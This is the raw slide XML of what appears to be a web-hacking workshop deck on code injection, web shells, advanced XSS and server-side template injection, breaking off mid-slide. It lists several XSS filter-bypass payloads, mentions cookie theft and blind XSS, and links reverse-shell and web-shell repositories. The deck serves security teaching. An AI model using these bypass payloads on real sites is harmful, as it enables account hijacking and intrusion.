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2b12f5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82b12f5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02d198c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02d198c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08c6745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08c6745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02d198cb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02d198c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73ccd35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73ccd35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82b12f5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82b12f5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Skip ahead a little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576e06b8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576e06b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608c6745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608c6745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08c6745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08c6745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08c674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608c674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df67c4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df67c4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c8c92569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c8c92569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bece4b73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bece4b73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df67c48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df67c48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82b12f5c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82b12f5c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Code Injection Types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XSS - modifying HTML page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SQL - modifying queries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Arbitrary code lets attacker do anything that the web server has permission to do</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Might be a way of getting single command RCE - like Laboratory</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Or it might be a web shel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Goal is often web shell</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gives you interactivity on the server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02d198c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02d198c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Shells - important step when gaining foothold/persistence on a box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Errors - process wrong type of file - overly verbose errors can expose more about the system, cause path disclosures etc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02d198c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02d198c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We’ll demo this later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08c6745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08c6745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Fix i.e. make unchangeable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02d198cb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02d198cb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08c6745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08c6745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7968174" y="4326475"/>
            <a:ext cx="1175825" cy="81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book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#identif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php.net/manual/en/language.oop5.magic.ph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0xdf.gitlab.io/2021/02/27/htb-academy.html#shell-manually" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.truesec.com/2020/02/12/from-s3-bucket-to-laravel-unserialize-r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medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/XPATH_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=L_FYYJPVywM&amp;t=2650s" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gosecure.github.io/presentations/2017-12-04-confoo/Bypassing%20Modern%20XSS%20Protections.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/advanced-techniques-bypass-defeat-xss-filters-part-1-0190257/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=JcOR9krOPFY&amp;t=2820s" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection"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owasp.org/www-community/xss-filter-evasion-cheatsheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/Double_Encoding" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/contexts" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/anatomy-of-an-attack-gaining-reverse-shell-from-sql-injection/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/SQL_Injection" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Twigonometry/Deserialisation-Demo" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Twigonometry/CTF-Tools/blob/master/scripts/jpegify.sh" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/support/xss-beating-html-sanitizing-filters" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting/cheat-she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hefesh.com/assets/wiki/Give%20it%20a%20Go%20-%20An%20Introduction%20to%20Web%20Hacking%20-%20PDF.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://shefesh.com/assets/wiki/Juice%20Shop%20Session%20-%20PDF.pdf" TargetMode="External"/><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null-byte.wonderhowto.com/how-to/bypass-file-upload-restrictions-web-apps-get-shell-0323454/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatur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pentestmonkey/php-reverse-shell" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tennc/webshell" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheBinitGhimire/Web-Shell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youtube.com/watch?v=nBg6zUalb7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Advanced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> Web Hacking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Magic Demo!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="Google Shape;112;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1321075" y="831225"/>
            <a:ext cx="6501842" cy="416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Advanced XSS</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="923875"/>
            <a:ext cx="8520600" cy="39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A Quick Recap</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>XSS is a way of inserting malicious HTML code into a page</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>There are a few main types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>XSS Defence Bypass</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Figure out what defences are being applied (if any). Are elements being deleted? Where is your code inserted?</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Match tags on HTML Element Content (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/p&gt;&lt;script&gt;alert(‘xss’)&lt;/script&gt;&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Insert into HTML Element Attributes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" autofocus onfocus=alert(document.domain) x="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Double encoding (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%253Cscript%253Ealert('XSS')%253C%252Fscript%253E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;&lt;script&gt;Foo&lt;/script&gt;iframe src="javascript:alert(‘xss’)"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Use event handlers over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> tags (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src/onerror=alert(‘xss’)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div onmouseover="alert(1)"&gt;test&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Encoding forbidden words in hexadecimal with leading 0s (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img onerror=a&amp;#x006c;ert(1) src=a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Use same source or default source payloads (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src=# onerror="alert('xxs')"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src=“/path/to/malicious”&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Add junk after tag name or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>replacing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> spaces before attributes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script/anyjunk&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img/anyjunk/onerror=alert(1) src=a&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Add tabs and spaces (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&amp;#9&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>), wacky casing (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;ScRipT&gt;alert(1)&lt;/sCriPt&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>) and null bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%00script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>) all over the place! You only have to get lucky once...</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t>Leveraging XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Stealing Cookies</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Redirecting User</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Performing actions on behalf of authenticated users</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Enumerating a Site</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS occurs when you cannot see the output of your injection</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>For example, submitting a ticket to an admin panel that is later rendered by an admin</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Blind XSS payloads must be able to identify where they were triggered, and often involve posting data to a custom server</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p2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Advanced XSS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40100" y="95700"/>
            <a:ext cx="82638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Server-Side Template Injection (SSTI)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="38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The Vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Templating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>languages, such as Joomla and Twig, use templates to dynamically generate web pages by inserting data into HTML code</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>When untrusted data is directly concatenated (rather than passed as a parameter) bad things can happen</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>We can use inbuilt templating language methods to extract data and execute code on the server...</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Example exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Template includes some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t> that is directly concatenated with other elements</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>Template Engine unsafely </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>renders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500"/>
              <a:t>the page on the server side: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>render(“&lt;h1&gt;Title: {{” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
